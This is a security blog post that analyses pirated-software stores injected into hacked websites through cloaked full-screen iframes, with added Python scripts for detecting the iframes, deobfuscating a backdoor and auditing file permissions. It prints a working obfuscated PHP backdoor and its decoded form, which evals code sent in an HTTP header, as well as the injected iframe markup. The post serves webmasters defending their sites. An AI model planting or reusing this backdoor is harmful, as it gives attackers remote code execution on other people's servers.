This is the time of the year when online sellers do their best to attract herds of holiday shoppers. Software pirates are no different. They offer huge discounts (up to 95%) for popular and expensive software products and provide user-friendly online stores. They even made their sites one step closer to you!
I’ve already written about black hat SEO schemes that pirates use to drive traffic to their sites. They all include compromising established legitimate sites and poisoning first pages of Google’s search results with links to doorway pages on hacked sites that redirect searchers further to illegal stores on servers controlled by criminals.
The doorway pages on legitimate websites are an important part of the scheme
However, there is a new development in this area. Instead of placing just doorway pages on compromised sites, hackers now create whole online stores there.
Here’s how it works: The keyword-rich spammy web pages on hacked sites check whether a visitor comes from a search engine and inject a full-screen iframe at the very top of the web page. The iframe contains a familiar “software discounter” online store (identical to the ones I wrote about before).
Note the double scrollbars on the screenshot — one pair of scrollbars belongs to the iframe and the other to the entire web page. If you scroll down, you’ll see the normal content of that web page.
Not every visitor from search engines can see that iframe. If a search query includes a “site:” operator, the iframe won’t be injected into the landing pages. Probably, the idea was to hide the shop from webmasters who use “site:” searches. However, the implementation of this idea is quite stupid — while the shop iframe is not visible, the spammy content on the landing page remains intact — a webmaster will be immediately aware of the compromise.
Although iframes allow loading web pages from third-party sites, in this case they load the “shop” pages from the same site. Here is typical iframe code injected at the very bottom of a landing page:
<iframe border=0 style="border:none" width="100%" height="100%" src="/?vprx=1&prx=nUE0pQbiY2kcqzHgp29zqUqupzHhozI0Y3Abo3Nip2IupzAbYm9mCJSlL2ucL2SxWzAjow02ZwD%3D&nd=Ym92pUW4CGRzpUW4CJ5IEGOjHJWcJGWeL3S6FTqjZwy6pIIkqKO6FTuirxxjJGAOLz8mGzyjZxy1pUcOLyygBJ1QFyAfGQW1L0jlH3uKrxSdo3pjZyc3EPHmEN%3D%3D"></iframe>
To make sure that styles and scripts on a hijacked web page don’t interfere with the shop iframe, hackers make the following change to the <body> tag:
All images and style sheets are also loaded from the same domain. They all have a similar URL structure. Something like this:
The indexed landing pages have URLs that also follow a specific pattern: example.com/?word=number or example.com/path/file?word=number
This makes me think that index files on these sites contain injected code that processes requests with specific parameters to generate spammy landing pages (?word=number) and “shop” web pages (?vprx=1&prx=….)
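As an added example (not code from the original post), here is a small Python checker that applies the two fingerprints described above: it pulls iframes out of a page and flags the ones that are same-origin, sized 100% x 100% and carry a ?vprx=…&prx=… query, and it classifies request paths (for instance from an access log) by the ?word=number landing-page pattern and the ?vprx=1&prx=… shop pattern. The HTML page and the log lines are constructed for the demo; the prx value is shortened.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample of a hacked landing page: normal content plus the full-screen
# "shop" iframe from the post, injected at the very bottom of the page.
SAMPLE_HTML = """<html><body>
<h1>Welcome to our club</h1>
<p>Buy cheap OEM software ... (keyword-rich spam text) ...</p>
<iframe border=0 style="border:none" width="100%" height="100%" src="/?vprx=1&prx=nUE0pQbiY2kcqz"></iframe>
</body></html>"""

IFRAME_RE = re.compile(r'<iframe\b([^>]*)>', re.I)
ATTR_RE = re.compile(r'''(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))''')


def iframe_attrs(tag_body):
    """Return the attributes of one <iframe ...> tag as a lowercase dict."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or '')
            for m in ATTR_RE.finditer(tag_body)}


def find_shop_iframes(html):
    """Return src values of iframes that look like the injected store:
    same-origin src, 100% x 100% size, and a ?vprx=...&prx=... query."""
    hits = []
    for m in IFRAME_RE.finditer(html):
        attrs = iframe_attrs(m.group(1))
        src = attrs.get('src', '')
        same_origin = src.startswith('/') and not src.startswith('//')
        full_size = attrs.get('width') == '100%' and attrs.get('height') == '100%'
        query = parse_qs(urlsplit(src).query)
        if same_origin and full_size and 'prx' in query and 'vprx' in query:
            hits.append(src)
    return hits


def classify_url(path_and_query):
    """Classify a request path by the URL patterns the post describes."""
    parts = urlsplit(path_and_query)
    query = parse_qs(parts.query)
    if query.get('vprx') == ['1'] and 'prx' in query:
        return 'shop'
    # Exactly one ?word=number parameter: the indexed spam landing pages.
    # Legitimate URLs such as ?page=2 match too, so treat this as a lead, not proof.
    if re.fullmatch(r'[A-Za-z]+=\d+', parts.query):
        return 'suspect-landing'
    return 'normal'


def scan_access_log(lines):
    """Group request paths from access-log lines (common log format) by classification."""
    result = {'shop': [], 'suspect-landing': [], 'normal': []}
    for line in lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if m:
            result[classify_url(m.group(1))].append(m.group(1))
    return result


if __name__ == '__main__':
    print(find_shop_iframes(SAMPLE_HTML))
    # Constructed log lines, not taken from any real server.
    log = [
        '1.2.3.4 - - [10/Dec/2010:10:00:00 +0000] "GET /?vprx=1&prx=abc HTTP/1.1" 200 5120',
        '1.2.3.4 - - [10/Dec/2010:10:00:01 +0000] "GET /blog/post.php?cheap=1234 HTTP/1.1" 200 8192',
        '5.6.7.8 - - [10/Dec/2010:10:00:02 +0000] "GET /index.php?id=5&cat=3 HTTP/1.1" 200 4096',
    ]
    print(scan_access_log(log))
```

Run it against a copy of a page fetched with a search-engine referrer (the cloaking only triggers for such visitors), or feed it your access log to see which URLs on your site are being requested with the shop parameters.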
Here is a list of real landing pages on compromised sites.
These rogue sites do pretty well in search results
On the latter screenshot, you can see how Google thinks that the rogue site on the-dream.co.uk matches the query (that returns 178,000 results) so well that it deserves 3 positions on the first page of search results plus the “+ show more results from the-dream.co.uk” link.
Maybe it’s just a coincidence, but about 85% of the hacked sites with pirated-software stores installed were found on different IPs in DreamHost networks:
Most of these sites are on shared servers. And when I check other sites on those servers I usually find a few more sites with spammy links and doorway pages.
This distribution of hacked sites makes me suspect that DreamHost servers are somehow attractive to hackers. Probably, there is a way for attackers to hop from server to server and search for hackable sites.
As far as I can see, the rogue software stores on hacked legitimate sites are basically the same as the ones on dedicated servers that I described both last week and a year ago. Their look and feel is the same, and on the final “checkout” step, they redirect to the well-known “paym8” sites (e.g. payment8ltd .net/shop/order/ or 8payment. net/shop/order/).
I still don’t have enough information on how these shops work internally. I tried to contact webmasters of compromised sites, but at this point have only received a couple of backdoor scripts. For example, this file called .php:
$_0f4f6b="\x70\x72\x65\x67\x5f\x72\x65\x70\x6c\x61\x63\x65";$_0f4f6b("\x7c\x2e\x7c\x65","\x65\x76\x61\x6c\x28\x27\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x22aWYobWQ1KCRfU0VSVkVSWydIVFRQX1FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7\x22\x29\x29\x3b\x27\x29",'.');
which, once the hex escapes and the base64 string are decoded (the “|.|e” pattern uses the preg_replace /e modifier, so the replacement string is executed as PHP), translates to something like this:
eval('eval("if(md5($_SERVER['HTTP_QUOTE'])=='e66e6cadd6e13efea54ed50c0eb2d32b' and isset($_SERVER['HTTP_X_CODE'])) @eval(@base64_decode(strrev(@$_SERVER['HTTP_X_CODE'])));")');
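As an added example (not part of the original post), the following Python script peels the two obfuscation layers shown above the same way I did by hand: it replaces the \xNN escapes, decodes any long base64 run that yields readable text, and reports the tell-tale constructs (preg_replace with the /e modifier, eval(base64_decode(...)), and a decoded stage that evals data taken from the HTTP request). The sample is the backdoor quoted in the post, with the line-wrap spaces removed; the detection patterns are my own and are only heuristics.

```python
import base64
import re

# The obfuscated backdoor quoted in the post (found in a file named ".php"),
# with the line-wrap spaces inside the escapes and the base64 removed.
SAMPLE = r'''$_0f4f6b="\x70\x72\x65\x67\x5f\x72\x65\x70\x6c\x61\x63\x65";$_0f4f6b("\x7c\x2e\x7c\x65","\x65\x76\x61\x6c\x28\x27\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x22aWYobWQ1KCRfU0VSVkVSWydIVFRQX1FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7\x22\x29\x29\x3b\x27\x29",'.');'''

HEX_ESCAPE_RE = re.compile(r'\\x([0-9A-Fa-f]{2})')
BASE64_RE = re.compile(r'[A-Za-z0-9+/]{40,}={0,2}')
# A quoted regex whose modifier list ends in "e": preg_replace then evals the replacement.
E_MODIFIER_RE = re.compile(r'''["']([|/#~!@%]).*?\1[a-zA-Z]*e["']''')


def unescape_hex(src):
    """Turn PHP "\\xNN" escapes into the characters they hide."""
    return HEX_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), src)


def decode_base64_blobs(src):
    """Decode every long base64 run that yields readable ASCII text."""
    payloads = []
    for m in BASE64_RE.finditer(src):
        try:
            data = base64.b64decode(m.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError
            continue
        if data and all(32 <= b < 127 or b in (9, 10, 13) for b in data):
            payloads.append(data.decode('ascii'))
    return payloads


def analyse(src):
    """Peel the obfuscation layers and list what the code would do."""
    stage1 = unescape_hex(src)
    payloads = decode_base64_blobs(stage1)
    findings = []
    if 'preg_replace' in stage1 and E_MODIFIER_RE.search(stage1):
        findings.append('preg_replace with /e modifier: replacement string is executed as PHP')
    if re.search(r'eval\s*\(\s*(?:@\s*)?base64_decode', stage1):
        findings.append('eval(base64_decode(...)): hidden second stage')
    for p in payloads:
        if re.search(r'eval\s*\(', p) and '$_SERVER[' in p:
            findings.append('decoded stage evals data taken from the HTTP request')
        if re.search(r'md5\s*\(\s*\$_SERVER\[', p):
            findings.append('decoded stage gates execution on an md5-hashed request header')
    return {'stage1': stage1, 'payloads': payloads, 'findings': findings}


if __name__ == '__main__':
    report = analyse(SAMPLE)
    print(report['stage1'])
    for p in report['payloads']:
        print('decoded payload:', p)
    for f in report['findings']:
        print('finding:', f)
```

Point it at any suspicious PHP file on your site (read the file and pass its contents to analyse); a clean file produces an empty findings list. A script that only becomes readable after unescaping, and then evals something from $_SERVER, $_GET or $_POST, is a backdoor and should be removed, not just cleaned.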
I guess it is clear that illegal online stores create serious problems for owners of compromised sites. Not only can they hurt search engine rankings for normal keywords and incur penalties, but they may also be a reason to remove your website from a server (most hosting ToS prohibit selling pirated software).
Please check my doorway/spammy links detection instructions that I posted last week — they are also useful for revealing any unwanted content on your site, including such rogue stores.
Make sure that your files and directories are not world-writable. Leaving anything where your server neighbors can write to is an invitation to abuse your site.
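As an added example (not from the original post), here is a Python audit that walks a web root and reports the two things worth looking for after reading the above: anything world-writable (the mode bit that lets server neighbours drop files into your site) and PHP files whose name starts with a dot, like the “.php” backdoor above, which a plain directory listing hides. The demo tree it builds in a temporary directory is constructed for the example; point audit_webroot at your real document root instead.

```python
import os
import stat
import tempfile


def audit_webroot(root):
    """Walk a web root and report world-writable files/directories and
    PHP files hidden behind a leading dot."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # a symlink's own mode bits are meaningless
            rel = os.path.relpath(path, root)
            mode = stat.S_IMODE(st.st_mode)
            if mode & stat.S_IWOTH:
                findings.append(('world-writable', rel, oct(mode)))
            if name.startswith('.') and name.endswith('.php'):
                findings.append(('hidden-php', rel, oct(mode)))
    return sorted(findings)


def build_demo_tree():
    """Constructed layout: a normal index.php, a mode-777 uploads/ directory and a
    world-writable file named ".php" inside it (a placeholder, not the real backdoor)."""
    root = tempfile.mkdtemp(prefix='webroot-demo-')
    uploads = os.path.join(root, 'uploads')
    os.mkdir(uploads)
    with open(os.path.join(root, 'index.php'), 'w') as f:
        f.write('<?php echo "hello"; ?>\n')
    os.chmod(os.path.join(root, 'index.php'), 0o644)
    with open(os.path.join(uploads, '.php'), 'w') as f:
        f.write('<?php /* placeholder, not the real backdoor */ ?>\n')
    os.chmod(os.path.join(uploads, '.php'), 0o666)
    os.chmod(uploads, 0o777)
    return root


if __name__ == '__main__':
    for kind, rel, mode in audit_webroot(build_demo_tree()):
        print(f'{kind:15} {mode:6} {rel}')
```

On a shared host the same check is what `find /path/to/site -perm -o+w` does; the script version is here so the dot-file check and the mode bits are handled in one pass and the result can be diffed between runs.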
Finally, if you find one of such shops on your site, you should contact the pirates (they provide a toll-free contact phone number +1-866-576-8741) and ask for your share in sales (don’t agree on less than 50%).
As always, I’m interested in any internal information about this sort of hacks. If you are a webmaster of a hacked site, or a representative of a hosting provider, please share your findings here in comments, or, if you don’t want to publicly disclose any sensitive information, you can contact me directly. Thanks.